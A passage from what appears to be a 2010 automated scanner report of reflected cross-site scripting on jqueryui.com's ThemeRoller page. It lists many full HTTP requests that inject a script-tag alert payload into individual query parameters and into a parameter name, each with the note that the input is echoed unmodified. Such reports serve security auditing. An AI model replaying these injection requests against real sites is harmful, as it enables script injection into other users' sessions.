&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83189"><script>alert(1)</script>49897045505 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold83189"><script>alert(1)</script>49897045505&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120191
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdabe"><script>alert(1)</script>92b58c8d02c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08cdabe"><script>alert(1)</script>92b58c8d02c&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae8b9"><script>alert(1)</script>aee3e277a5 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222ae8b9"><script>alert(1)</script>aee3e277a5&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120253
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c16"><script>alert(1)</script>7fb96a46603 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c0882c16"><script>alert(1)</script>7fb96a46603&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c249f"><script>alert(1)</script>98f0b51fcf6 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27ac249f"><script>alert(1)</script>98f0b51fcf6&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5287f"><script>alert(1)</script>c5daa8ea141 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff5287f"><script>alert(1)</script>c5daa8ea141&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1269"><script>alert(1)</script>55ed6b8ddc4 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1d1269"><script>alert(1)</script>55ed6b8ddc4&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb51"><script>alert(1)</script>0aa0fcacc1c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... 100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08dcb51"><script>alert(1)</script>0aa0fcacc1c&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png ...[SNIP]...
4.174. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a79"><script>alert(1)</script>e2b9c487bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?a2a79"><script>alert(1)</script>e2b9c487bc1=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:56:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f207"><script>alert(1)</script>b6937b6baad was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px8f207"><script>alert(1)</script>b6937b6baad&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c51e"><script>alert(1)</script>866f1ad0c97 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px8c51e"><script>alert(1)</script>866f1ad0c97&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a567e"><script>alert(1)</script>8e28c85fa0f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50a567e"><script>alert(1)</script>8e28c85fa0f&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a79c3"><script>alert(1)</script>0133da4d252 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20a79c3"><script>alert(1)</script>0133da4d252&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows 